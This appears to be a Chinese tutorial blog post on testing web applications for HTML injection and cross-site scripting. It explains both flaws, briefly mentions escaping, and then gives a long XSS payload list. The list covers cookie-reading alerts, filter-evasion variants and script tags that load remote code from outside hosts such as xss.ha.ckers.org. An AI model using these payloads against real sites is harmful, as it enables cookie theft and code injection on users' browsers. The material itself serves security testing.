WEB漏洞测试——HTML注入及XSS注入
HTML注入
原理
目前我们所接触展示页面基本上都是由html来实现的,那么后台在处理内容的时候,是对html很少处理的,如果用户刻意通过输入框、文本框、查询框来填写html、js代码(脚本注入),那么就会造成漏洞,若填写恶意网站,病毒网站,这样是很恐怖的。
举个栗子
新建项目标题中添加html标签注入测试
结果:真的变成了一个链接
点击这个连接可以跳转过去,如果不是百度的连接,而是恶意网站呢,测试也是可以研究一下如何去避免注入的,比如通过将特殊字符进行转义,记不记得>,<,可以转义为>,<当然还可以使用其他方式,这个是可以去扩展的
XSS注入
原理
1、概念
XSS全称为(Cross Site Scripting)跨站脚本攻击
其实XSS攻击是web程序中最常见的漏洞之一,其实就是在网页中添加JavaScript(js)语句来攻击网站,脚本就在浏览器上执行时,可以通过获取用户cookie,导航到恶意网站,弹出恶意信息,携带木马病毒等,这些危害WEB程序真的是致命一击。
2、举个栗子
最常见的xss注入语句:在上一步的造作中,我将文件的标题输入为<script alert(‘hello,xss’)>;保存后,点击这个文件,xss注入就出现了,alert出了我们所输入的内容
XSS注入常用语句
<script>alert('hello,gaga!');</script> //经典语句,哈哈!
>"'><img src="javascript.:alert('XSS')">
>"'><script>alert('XSS')</script>
<table background='javascript.:alert(([code])'></table>
<object type=text/html data='javascript.:alert(([code]);'></object>
"+alert('XSS')+"
'><script>alert(document.cookie)</script>
='><script>alert(document.cookie)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
<script>alert('XSS')</script>
<img src="javascript:alert('XSS')">
%0a%0a<script>alert(\"Vulnerable\")</script>.jsp
%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html
<script>alert('Vulnerable')</script>
a.jsp/<script>alert('Vulnerable')</script>
"><script>alert('Vulnerable')</script>
<IMG SRC="javascript.:alert('XSS');">
<IMG src="/javascript.:alert"('XSS')>
<IMG src="/JaVaScRiPt.:alert"('XSS')>
<IMG src="/JaVaScRiPt.:alert"("XSS")>
<IMG SRC="jav	ascript.:alert('XSS');">
<IMG SRC="jav
ascript.:alert('XSS');">
<IMG SRC="jav
ascript.:alert('XSS');">
"<IMG src="/java"\0script.:alert(\"XSS\")>";'>out
<IMG SRC=" javascript.:alert('XSS');">
<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
<BODY BACKGROUND="javascript.:alert('XSS')">
<BODY ONLOAD=alert('XSS')>
<IMG DYNSRC="javascript.:alert('XSS')">
<IMG LOWSRC="javascript.:alert('XSS')">
<BGSOUND SRC="javascript.:alert('XSS');">
<br size="&{alert('XSS')}">
<LAYER SRC="http://xss.ha.ckers.org/a.js"></layer>
<LINK REL="stylesheet"HREF="javascript.:alert('XSS');">
<IMG SRC='vbscript.:msgbox("XSS")'>
<META. HTTP-EQUIV="refresh"CONTENT="0;url=javascript.:alert('XSS');">
<IFRAME. src="/javascript.:alert"('XSS')></IFRAME>
<FRAMESET><FRAME. src="/javascript.:alert"('XSS')></FRAME></FRAMESET>
<TABLE BACKGROUND="javascript.:alert('XSS')">
<DIV STYLE="background-image: url(javascript.:alert('XSS'))">
<DIV STYLE="behaviour: url('http://www.how-to-hack.org/exploit.html');">
<DIV STYLE="width: expression(alert('XSS'));">
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<IMG STYLE='xss:expre\ssion(alert("XSS"))'>
<STYLE. TYPE="text/javascript">alert('XSS');</STYLE>
<STYLE. TYPE="text/css">.XSS{background-image:url("javascript.:alert('XSS')");}</STYLE><A CLASS=XSS></A>
<STYLE. type="text/css">BODY{background:url("javascript.:alert('XSS')")}</STYLE>
<BASE HREF="javascript.:alert('XSS');//">
getURL("javascript.:alert('XSS')")
a="get";b="URL";c="javascript.:";d="alert('XSS');";eval(a+b+c+d);
<XML SRC="javascript.:alert('XSS');">
"> <BODY NLOAD="a();"><SCRIPT>function a(){alert('XSS');}</SCRIPT><"
<SCRIPT. SRC="http://xss.ha.ckers.org/xss.jpg"></SCRIPT>
<IMG SRC="javascript.:alert('XSS')"
<SCRIPT. a=">"SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT.=">"SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT. a=">"''SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT."a='>'"SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PTSRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<A HREF=http://www.gohttp://www.google.com/ogle.com/>link</A>
参考文章:
http://www.51testing.com/html/93/316693-814899.html
https://www.cnblogs.com/TankXiao/archive/2012/03/21/2337194.html
WEB漏洞测试——HTML注入及XSS注入相关推荐
- WEB漏洞测试(二)——HTML注入 XSS攻击
上一篇介绍了我们安装BWAPP来完成我们的漏洞测试 在BWAPP中,将HTML Injection和XSS做了非常详细的分类,那么为什么要将两个一起讲呢?归根结底,我觉得这两个分明是一个玩意,充其量是 ...
- OWASP TOP 10(2021)之注入漏洞(SQL注入和XSS注入)
目录 一.SQL注入 1. 漏洞概述及原理 2. 漏洞可能造成的危害 3. 漏洞防范 4. SQL注入的分类与检测 5. 从攻击者的角度,如何绕过SQL注入防范呢? (1)对于关键字的绕过 (2)缓冲 ...
- 国产WEB漏洞测试平台——MST
国产WEB漏洞测试平台--MST Mst是一款Python2.7编写的小漏洞利用平台,可运行在windows | Backtrack | maxosx 等系统,专注于web漏洞的测试和各种利用插件的编 ...
- 使用Docker如何搭建Web漏洞测试环境?
本文和大家分享的是使用Docker搭建Web漏洞测试环境相关知识,希望对大家学习Docker有所帮助,一起来看看吧. 由于一直在做 Web 漏洞扫描器的开发, 那么就必然少不了 Web 的漏洞测试环境 ...
- ESP8266 wifi killer固件汉化版web ui界面wifi名字存在xss注入
一.漏洞简介 了解无线安全的同学应该都知道基于ESP8266的wifi killer固件,可以用来辅助无线渗透测试,其自带了一个web管理界面,其中有一个wifi ap列表,就是这个列表存在xss注入 ...
- web漏洞“小迪安全课堂笔记”SQL注入
文章目录 前言 SQL注入是什么? 注入原理 数据库结构 mysql数据库 参数类型 请求方法 如何判断注入点? 判断注入 1.信息收集 2.数据注入 3.高权限注入 魔术引号开关 跨库注入 获取所有 ...
- 各种Web漏洞测试平台
为什么80%的码农都做不了架构师?>>> Sqli Lab 支持报错注入.二次注入.盲注.Update注入.Insert注入.Http头部注入.二次注入练习等.支持GET和P ...
- WEB漏洞篇——跨站脚本攻击(XSS)
目录 一.XSS简述 1.1 什么是XSS 1.2 XSS分类 1.3 DOM XSS漏洞演示 二.XSS攻击进阶 2.1 初探XSS Payload 2.2 强大的XSS Payload 2.3 X ...
- 记录一款web漏洞扫描工具,包含sql注入、xss攻击等各种漏洞扫描
名称:Burpsuite 官网地址:https://portswigger.net/burp/releases
最新文章
- 「译」有限状态机在 CSS 动画中的应用
- Apache Flink 零基础入门(十二)Flink sink
- DLL入门浅析(1)——如何建立DLL
- 大工13秋《计算机文化基础》在线测试1,大工13秋《计算机文化基础》辅导资料六...
- mysql批量删除进程_小程序批量删除云数据库里的数据
- 纵深防御及MS纵深防御模型
- 直线段的矢栅转换算法(DDA算法、中心画线算法、Bresenham算法)
- T-SQL 基础简介
- 28、ZigBee 开发教程之基础篇—红外对射计数器
- COSTDOWN版本的NRF51802和NRF51822的复位问题
- developer 开启双重验证 your appid needs to be updated
- python的主流开发工具排名,最常用的python开发工具
- Linux面试指令---nl指令
- DEV Gridcontrol 多选功能实现
- egg extend ts_KPL五周T队排名,“天王级”战队只有两个,TS被踢出队列
- 第十二届闽台陈靖姑民俗文化旅游节在福州启动
- ChromeDriver与Chrome版本对应参照表及ChromeDriver下载链接
- html中段落标志中标注文件子标题的是,Macromedia网页设计认证部分试题
- 多个DHL快递物流怎么同时查询最方便
- RS232的硬件流控:DCD DSR DTR RTS CTS
热门文章
- Java 基础:多态
- VMware Workstation 与 Device/Credential Guard 不兼容。在禁用 Device/Credential Guard 后.....报错解决
- 笔记:caffe安装编译,并用ssd gpu训练自己的数据集
- 常用清新蓝花背景word通用个人简历模板
- 掌握这些图片无损压缩工具,轻松搞定图片压缩
- 快速集成华为AGC云存储服务-Web
- 自动称重机动态和静态称重方式,很好理解!
- 国际经济与贸易专业与计算机联系,经济与贸易专业(国际经济与贸易方向).docx...
- Webug-SSRF
- WIN32虚拟STM32F7 LCD屏幕(WIN32虚拟单片机)